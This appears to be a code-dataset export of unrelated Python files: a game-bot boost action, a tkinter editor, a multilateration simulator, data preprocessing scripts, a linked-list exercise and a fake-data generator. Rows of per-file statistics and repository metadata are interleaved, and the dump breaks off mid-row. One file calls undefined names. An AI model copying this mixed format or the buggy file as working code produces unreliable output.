from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost


class BoostGrab(Action):
    def __init__(self, boost: Boost = None, boost_tracker: BoostTracker = None, only_in_path=False, max_time_to_boost=None, state: str = None):
        super().__init__()
        self.boost = boost
        self.pad = None
        self.boost_tracker = boost_tracker
        self.in_path = only_in_path
        self.max_time = max_time_to_boost
        self.target = None
        if self.boost is not None:
            self.target = Vec3(self.boost.location)
        self.state = "grabbing boost"
        if state is not None:
            self.state = state

    def update(self, packet: GameTickPacket):
        if self.boost is not None:
            self.boost.update(packet)

    def initialize_target_boost(self, car: Car):
        if not car.flying:
            if not self.max_time:
                self.boost, self.pad = car.get_closest_boosts(self.boost_tracker, self.in_path)
                if not self.boost:
                    self.boost = self.pad
            else:
                self.boost, self.pad, times = car.get_closest_boosts(self.boost_tracker, in_current_path=self.in_path,
                                                                     path_angle_limit=0, return_time_to=True)
                # No boost reachable. Life sucks
                if times[0] >= self.max_time and times[1] >= self.max_time:
                    return False
                if times[1] < self.max_time:
                    self.boost = self.pad
            print("Boost target acquired!")
            self.target = Vec3(self.boost.location)
            return True

    def run(self, car: Car = None, ball: Ball = None) -> SimpleControllerState:
        if self.finished:
            return SimpleControllerState()
        if not self.boost and self.boost_tracker is not None:
            if not self.initialize_target_boost(car):
                self.finished = True
        # Bail if finished, no boost passed, or boost no longer active
        if self.finished or (not self.boost):
            return self.controls
        self.controls = drive_to_target(car, self.target.flat(), controls=self.controls)
        # finished if close enough, boost taken, or car got enough along the way
        if (car.local(self.target - car.location).length() < 100 or not self.boost.is_active) or car.boost > 99:
            print("Grabbed boost!")
            self.finished = True
        return self.controls
| 42.96875
| 136
| 0.623636
| 360
| 2,750
| 4.613889
| 0.255556
| 0.10295
| 0.036123
| 0.038531
| 0.171583
| 0.138471
| 0.103552
| 0
| 0
| 0
| 0
| 0.006202
| 0.296364
| 2,750
| 64
| 137
| 42.96875
| 0.852196
| 0.058909
| 0
| 0.181818
| 0
| 0
| 0.019342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072727
| false
| 0
| 0.163636
| 0
| 0.345455
| 0.036364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb
| 2,026
|
py
|
Python
|
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
import sys
from tkinter import *
from tkinter import filedialog

####################
#    FUNCTIONS     #
####################


def saveas():
    global text
    t = text.get("1.0", "end-1c")
    savelocation = filedialog.asksaveasfilename()
    file1 = open(savelocation, "w+")
    file1.write(t)
    file1.close()


def darktheme():
    global text
    text.config(background='black', foreground='white',
                insertbackground='white')


def lighttheme():
    global text
    text.config(background='white', foreground='black',
                insertbackground='black')


def FontHelvetica():
    global text
    text.config(font="Helvetica")


def FontCourier():
    global text
    text.config(font="Courier")


def FontArial():
    global text
    text.config(font="Arial")


def FontTimes():
    global text
    text.config(font='Times')


#########################
#      TEXT EDITOR      #
#########################
# Create text editor
text_editor = Tk("Kenza's text editor")

# Add text widget
text = Text(text_editor)
text.grid()

# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)

# Dark mode
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)

# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)

# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
                          command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
                          command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
                          command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
                          command=FontTimes)
text_editor.mainloop()
| 20.886598
| 64
| 0.633268
| 235
| 2,026
| 5.412766
| 0.289362
| 0.078616
| 0.066038
| 0.09434
| 0.283019
| 0.045597
| 0
| 0
| 0
| 0
| 0
| 0.009231
| 0.197927
| 2,026
| 96
| 65
| 21.104167
| 0.773538
| 0.053307
| 0
| 0.125
| 0
| 0
| 0.073157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.053571
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5cbe5565f6ab8319a2c93389c8a977b851666a
| 525
|
py
|
Python
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 106
|
2017-11-09T13:58:45.000Z
|
2021-12-20T03:11:19.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 6
|
2017-10-30T13:29:49.000Z
|
2021-09-13T12:06:59.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 39
|
2017-10-30T16:35:01.000Z
|
2021-10-31T10:32:48.000Z
|
""" Default import all .py files in current directory """
from glob import iglob
from re import search

__all__ = []

""" Find all DB model modules and their paths """
for path in iglob('./**/*.py', recursive=True):
    model_pattern = r'.*/models/\w+\.py'
    if search(model_pattern, path) is not None:
        """ Get model modules """
        FILE_INDEX = -1  # Files are the last part of a path
        # slice off the '.py' extension; rstrip('.py') would strip characters,
        # mangling names such as 'happy.py' -> 'ha'
        module = path.split('/')[FILE_INDEX][:-len('.py')]
        if module != '__init__':
            __all__.append(module)
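# Illustrative path (hypothetical): './api/models/user.py' matches
# model_pattern, so 'user' is appended to __all__, while '__init__.py'
# itself is skipped.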
| 32.8125
| 59
| 0.617143
| 72
| 525
| 4.277778
| 0.638889
| 0.077922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002494
| 0.23619
| 525
| 15
| 60
| 35
| 0.765586
| 0.161905
| 0
| 0
| 0
| 0
| 0.10585
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760
| 1,374
|
py
|
Python
|
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
from tdoa_sim import TDOASim
import numpy as np


class Multilateration(TDOASim):
    # Assumptions: Three hydrophones forming a right angle in the xz plane
    # Hydrophones 1 and 2 form the horizontal pair, and 2 and 3 form the vertical
    # https://en.wikipedia.org/wiki/Multilateration - cartesian solution
    def calculate_xyz(self, pinger_loc):
        relative_toas = self.calc_tdoas(pinger_loc) + .01  # Add .01 to eliminate div by 0 - this needs a much better implementation
        x1, y1, z1 = self.hydrophones[0]
        t1 = relative_toas[0]
        c = self.v_sound
        lhs = []
        rhs = []
        for i in range(1, 4):
            xm, ym, zm = self.hydrophones[i]
            tm = relative_toas[i]
            A = (2 * xm) / (c * tm) - (2 * x1) / (c * t1)
            B = (2 * ym) / (c * tm) - (2 * y1) / (c * t1)
            C = (2 * zm) / (c * tm) - (2 * z1) / (c * t1)
            D = c * tm - c * t1 - (xm ** 2 + ym ** 2 + zm ** 2) / (c * tm) + (x1 ** 2 + y1 ** 2 + z1 ** 2) / (c * t1)
            lhs.append([A, B, C])
            rhs.append(-D)
        lhs = np.array(lhs)
        rhs = np.array(rhs)
        return np.linalg.solve(lhs, rhs)

    def calculate_bearing(self, pinger_loc):
        x, y, z = self.calculate_xyz(pinger_loc)
        return (np.rad2deg(np.arctan2(y, x)), np.rad2deg(np.arctan2(np.sqrt(x ** 2 + y ** 2), z)))
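# Usage sketch (the constructor signature comes from TDOASim, which is not
# shown here, and the pinger location is a made-up value):
# sim = Multilateration(...)
# azimuth_deg, inclination_deg = sim.calculate_bearing(np.array([1.0, 2.0, 0.5]))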
| 37.135135
| 129
| 0.532751
| 207
| 1,374
| 3.47343
| 0.429952
| 0.020862
| 0.01669
| 0.05007
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048335
| 0.322416
| 1,374
| 36
| 130
| 38.166667
| 0.723953
| 0.204512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.08
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009
| 2,811
|
py
|
Python
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2021-09-18T08:01:19.000Z
|
2021-09-18T08:01:19.000Z
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | null | null | null |
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2018-05-13T08:39:46.000Z
|
2018-05-13T08:39:46.000Z
|
#!/usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate

# sns.set()  # switch to seaborn default
# sns.set_style("whitegrid")

# load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
# load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)

tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
    for j in range(len(tn_msncodes)):
        if tx_data["MSN"][i] == tn_msncodes[j]:
            tx_msn.append(tx_data["MSN"][i])
            tx_year.append(tx_data["Year"][i])
            tx_value.append(tx_data["Data"][i])
        else:
            pass

tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
                  index=False, index_label=False, sep=',')
# print(tx_tn_data)

sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
    if tx_tn_data["MSN"][i] == "TNACB":
        tnacb["Year"].append(tx_tn_data["Year"][i])
        tnacb["Data"].append(tx_tn_data["Data"][i])
    elif tx_tn_data["MSN"][i] == "TNCCB":
        tnccb["Year"].append(tx_tn_data["Year"][i])
        tnccb["Data"].append(tx_tn_data["Data"][i])
    elif tx_tn_data["MSN"][i] == "TNICB":
        tnicb["Year"].append(tx_tn_data["Year"][i])
        tnicb["Data"].append(tx_tn_data["Data"][i])
    elif tx_tn_data["MSN"][i] == "TNRCB":
        tnrcb["Year"].append(tx_tn_data["Year"][i])
        tnrcb["Data"].append(tx_tn_data["Data"][i])
    else:
        pass

tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
                  index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
                  index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
                  index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
                  index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
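# Refactor sketch (same behavior as the branches above; the names reuse the
# dicts already defined in this script):
# for code, d in zip(sectors, (tnacb, tnccb, tnicb, tnrcb)):
#     mask = tx_tn_data["MSN"] == code
#     frame = tx_tn_data.loc[mask, ["Year", "Data"]]
#     frame.to_csv("data/csv/consumption/sector/tx/tn/{}.csv".format(code.lower()),
#                  index=False, index_label=False, sep=',')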
| 30.554348
| 106
| 0.645322
| 428
| 2,811
| 4.035047
| 0.165888
| 0.06022
| 0.083382
| 0.064852
| 0.430805
| 0.381008
| 0.335843
| 0.215402
| 0.153445
| 0.067748
| 0
| 0.000429
| 0.170758
| 2,811
| 91
| 107
| 30.89011
| 0.740455
| 0.08111
| 0
| 0.130435
| 0
| 0
| 0.18592
| 0.112408
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.028986
| 0.130435
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c699b1ae35663ad09b05a480af4601cff664c7b
| 1,276
|
py
|
Python
|
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | null | null | null |
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | 1
|
2020-09-06T04:17:59.000Z
|
2020-09-06T04:17:59.000Z
|
opennem/core/stations/station_code_from_duids.py
|
tourdownunder/opennem
|
deec3e2079db9d9d84171010fd0c239170d1e7ce
|
[
"MIT"
] | null | null | null |
from functools import reduce
from typing import List, Optional

from opennem.core.normalizers import is_single_number


def getcommonletters(strlist):
    return "".join(
        [
            x[0]
            for x in zip(*strlist)
            if reduce(lambda a, b: (a == b) and a or None, x)
        ]
    )


def findcommonstart(strlist):
    strlist = strlist[:]
    prev = None
    while True:
        common = getcommonletters(strlist)
        if common == prev:
            break
        strlist.append(common)
        prev = common
    return getcommonletters(strlist)


def station_code_from_duids(duids: List[str]) -> Optional[str]:
    """
    Derives a station code from a list of duids
    ex.
    BARRON1,BARRON2 => BARRON
    OSBAG,OSBAG => OSBAG
    """
    if type(duids) is not list:
        return None
    if not duids:
        return None
    if len(duids) == 0:
        return None
    duids_uniq = list(set(duids))
    common = findcommonstart(duids_uniq)
    if not common:
        return None
    # strip a trailing digit, then a trailing underscore, if present
    if is_single_number(common[-1]):
        common = common[:-1]
    if common.endswith("_"):
        common = common[:-1]
    if len(common) > 2:
        return common
    return None
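# Illustrative calls (values invented for this sketch):
# station_code_from_duids(["BARRON1", "BARRON2"])  -> "BARRON"
# station_code_from_duids(["OSBAG"])               -> "OSBAG"
# station_code_from_duids(["A1", "B2"])            -> None (no usable common prefix)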
| 19.044776
| 63
| 0.580721
| 154
| 1,276
| 4.746753
| 0.402597
| 0.068399
| 0.038304
| 0.04104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009335
| 0.32837
| 1,276
| 66
| 64
| 19.333333
| 0.843641
| 0.104232
| 0
| 0.179487
| 0
| 0
| 0.000911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0.025641
| 0.358974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6baa9940a450d52040d4e352d35fb76791c5db
| 1,733
|
py
|
Python
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | 1
|
2019-11-06T19:21:49.000Z
|
2019-11-06T19:21:49.000Z
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
from database.interface import FirebaseInterface


class Schedule:
    def __init__(self):
        self.id = None
        self.titulo = None
        self.data = None
        self.caminhao = None
        self.mecanico = None

    def validateFields(self, office_schedule):
        if self.titulo is None:
            raise Exception("Título não informado")
        if self.data is None:
            raise Exception("Data não informada")
        else:
            for event in office_schedule:
                if event["data"] == self.data:
                    raise Exception("Dia solicitado não está disponível")
        if self.caminhao is None:
            raise Exception("Caminhão não encontrado")
        if self.mecanico is None or self.mecanico["cargo"] != "mecanico":
            raise Exception("Mecânico não encontrado")

    def buildObject(self, req):
        interface = FirebaseInterface()
        user_id = req["id_usuario"]
        self.mecanico = interface.getData("users", user_id)
        truck_board = req["placa_caminhao"]
        self.caminhao = interface.getDataByField("trucks", "placa", truck_board)
        self.data = req["data"]
        self.titulo = req["titulo"]

    def setId(self):
        interface = FirebaseInterface()
        event_id = interface.getData("const_data", "office_id")
        self.id = event_id["id"] + 1
        interface.updateData({"id": event_id["id"] + 1}, "const_data", "office_id")

    @staticmethod
    def findIdIndex(id, office):
        for index in range(len(office)):
            if office[index]["id"] == id:
                return index
            elif index + 1 == len(office) and office[index]["id"] != id:
                raise Exception("Id inválido")
| 30.403509
| 83
| 0.590306
| 194
| 1,733
| 5.175258
| 0.324742
| 0.083665
| 0.032869
| 0.059761
| 0.023904
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002469
| 0.298904
| 1,733
| 56
| 84
| 30.946429
| 0.823868
| 0
| 0
| 0.04878
| 0
| 0
| 0.140796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0
| 0.02439
| 0
| 0.195122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6d83deebd752e29ffb47bbb2f60866fbe395f9
| 1,947
|
py
|
Python
|
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py
|
dopiwoo/Grokking-the-Coding-Interview
|
78b2bacf9d761b460ac78882bac42df7465feec9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo

Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""


class Node:
    def __init__(self, value: int, next_node: 'Node' = None):
        self.value = value
        self.next = next_node

    def __repr__(self) -> str:
        string = ''
        temp_node = self
        while temp_node is not None:
            string += '->' + str(temp_node.value)
            temp_node = temp_node.next
        return string[2:]


def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
    """
    Time Complexity: O(N)
    Space Complexity: O(1)
    Parameters
    ----------
    head : Node
        Input head of a LinkedList.
    k : int
        Input number 'k'.
    Returns
    -------
    Node or None
        The LinkedList with every alternating 'k' sized sub-list reversed, starting from the head.
    """
    if not head:
        return None
    cur, prev = head, None
    while cur:
        i = 0
        tail, con = cur, prev
        # reverse the next k nodes
        while cur and i < k:
            third = cur.next
            cur.next = prev
            prev = cur
            cur = third
            i += 1
        if con:
            con.next = prev
        else:
            head = prev
        tail.next = cur
        # skip the next k nodes
        i = 0
        while cur and i < k:
            prev = cur
            cur = cur.next
            i += 1
    return head


if __name__ == '__main__':
    a = Node(1)
    a.next = Node(2)
    a.next.next = Node(3)
    a.next.next.next = Node(4)
    a.next.next.next.next = Node(5)
    a.next.next.next.next.next = Node(6)
    a.next.next.next.next.next.next = Node(7)
    a.next.next.next.next.next.next.next = Node(8)
    print(a)
    print(reverse_alternative_k_elements(a, 2))
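# Expected output of the demo above (k=2 reverses every other pair):
# 1->2->3->4->5->6->7->8
# 2->1->3->4->6->5->7->8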
| 24.037037
| 117
| 0.546482
| 278
| 1,947
| 3.723022
| 0.330935
| 0.170048
| 0.173913
| 0.154589
| 0.226087
| 0.180676
| 0.156522
| 0.096618
| 0.096618
| 0.096618
| 0
| 0.021756
| 0.338983
| 1,947
| 80
| 118
| 24.3375
| 0.78244
| 0.291217
| 0
| 0.173913
| 0
| 0
| 0.010679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0
| 0
| 0.152174
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9
| 6,625
|
py
|
Python
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | 2
|
2021-02-13T13:19:45.000Z
|
2021-02-13T14:46:02.000Z
|
generate_fake_data.py
|
upb-uc4/deployment
|
0c82de72bb7e758c5afaf8866b238ff17cf908ea
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
import os
import re

from faker import Faker

################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10

ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
    "Computer Science",
    "Chemistry",
    "Biology",
    "Physics",
    "Religion",
    "Sociology",
]
MODULE_PREFICES = [
    "Topics of",
    "Introduction to",
    "Applied",
    "Theoretical",
    "Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]

fake = Faker("en-US")
fake.random.seed(654321)
################################################################################

basepath = os.path.join("defaults", "generated")
lecturer_ids = []
modules_by_field_of_study = {
    field: [] for field in FIELDS_OF_STUDY
}  # Dict with modules mapped to their field of study (to let generated data appear less random)


def generate_user(role: str):
    assert role in ROLES
    strip_username = lambda username: re.sub("^[a-zA-Z-.]", "", username)
    profile = fake.simple_profile()
    while (
        len(profile["name"].split(" ")) != 2
        and len(strip_username(profile["username"])) not in range(5, 17)
    ):  # Some names were like Mr. John Smith...
        profile = fake.simple_profile()
    username = strip_username(profile["username"])
    return {
        "governmentId": username + fake.pystr(),
        "authUser": {
            "username": username,
            "password": username,  # more convenient than fake.password()
            "role": role,
        },
        "user": {
            "username": username,
            "enrollmentIdSecret": "",
            "isActive": True,
            "role": role,
            "address": {
                "street": fake.street_name(),
                "houseNumber": fake.building_number().lstrip("0"),
                "zipCode": fake.postcode(),
                "city": fake.city(),
                "country": random.choice(COUNTRIES)
            },
            "firstName": profile["name"].split(" ")[0],
            "lastName": profile["name"].split(" ")[1],
            "email": profile["mail"],
            "birthDate": profile["birthdate"].strftime("%Y-%m-%d"),
            "phoneNumber": "+{:012d}".format(fake.pyint(0, int("9" * 12))),
        },
    }


def generate_student():
    student = generate_user("Student")
    student["user"]["latestImmatriculation"] = ""
    student["user"]["matriculationId"] = str(fake.pyint(1000000, 9999999))
    return student


def generate_lecturer(all_lecturer_ids: list):
    lecturer = generate_user("Lecturer")
    lecturer["user"]["freeText"] = fake.paragraph()
    lecturer["user"]["researchArea"] = fake.job()
    all_lecturer_ids.append(lecturer["user"]["username"])
    return lecturer


def generate_admin():
    return generate_user("Admin")


def generate_exam_reg(all_modules: list):
    field_of_study = random.choice(FIELDS_OF_STUDY)
    my_modules = []
    count = random.randint(2, 5)  # Random number of modules for this exam reg
    for _ in range(count):
        # Choose existing or generate new module for this exam reg
        if random.random() < 0.8 or not my_modules:
            new_module = {
                "id": "M."
                + str(fake.pyint(0, 9999)).zfill(4)
                + "."
                + str(fake.pyint(0, 99999)).zfill(5),
                "name": random.choice(MODULE_PREFICES) + " " + field_of_study,
            }
            all_modules[field_of_study].append(new_module)
            my_modules.append(new_module)
        elif (
            field_of_study in modules_by_field_of_study
            and modules_by_field_of_study[field_of_study]
        ):
            module_cand = random.choice(modules_by_field_of_study[field_of_study])
            if module_cand and module_cand not in my_modules:
                my_modules.append(module_cand)
    return {
        "name": random.choice(["Bachelor", "Master"])
        + " "
        + field_of_study
        + " v"
        + str(fake.pyint(1, 8)),
        "active": True,
        "modules": my_modules,
    }


def generate_course():
    lecturer = random.choice(lecturer_ids)
    flatten = lambda list_to_flatten: [
        item for sub_list in list_to_flatten for item in sub_list
    ]
    all_module_ids = set(
        map(
            lambda module: module.get("id"), flatten(modules_by_field_of_study.values())
        )
    )
    module_ids = random.sample(all_module_ids, random.randint(1, 4))
    return {
        "courseId": "",
        "moduleIds": module_ids,
        "courseName": fake.catch_phrase(),
        "courseType": random.choice(COURSE_TYPES),
        "startDate": "2020-12-08",
        "endDate": "2020-12-08",
        "ects": random.randint(3, 10),
        "lecturerId": lecturer,
        "maxParticipants": 10 * random.randint(1, 20),
        "currentParticipants": 0,
        "courseLanguage": random.choice(["German", "English"]),
        "courseDescription": fake.paragraph(2),
    }


def write_to_file(data, _dir, filename):
    directory = os.path.join(os.path.dirname(__file__), basepath, _dir)
    if not os.path.exists(directory):
        os.makedirs(directory)
    with open(os.path.join(directory, filename), "w+") as f:
        f.write(data)


def json_dump_dict(data: dict):
    return json.dumps(data, indent=4)


for i in range(ADMIN_COUNT):
    # note: this loop originally called generate_student(), which wrote
    # students into the admins folder; generate_admin() matches the intent
    write_to_file(
        json_dump_dict(generate_admin()), "admins", str(i).zfill(2) + ".json"
    )
for i in range(STUDENT_COUNT):
    write_to_file(
        json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
    )
for i in range(LECTURER_COUNT):
    write_to_file(
        json_dump_dict(generate_lecturer(lecturer_ids)),
        "lecturers",
        str(i).zfill(2) + ".json",
    )
for i in range(EXAM_REG_COUNT):
    write_to_file(
        json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
        "examRegs",
        str(i).zfill(2) + ".json",
    )
for i in range(COURSE_COUNT):
    write_to_file(
        json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
    )

print("Done!")
print(
    "Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
        ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
    )
)
| 30.113636
| 148
| 0.579019
| 747
| 6,625
| 4.92905
| 0.313253
| 0.032319
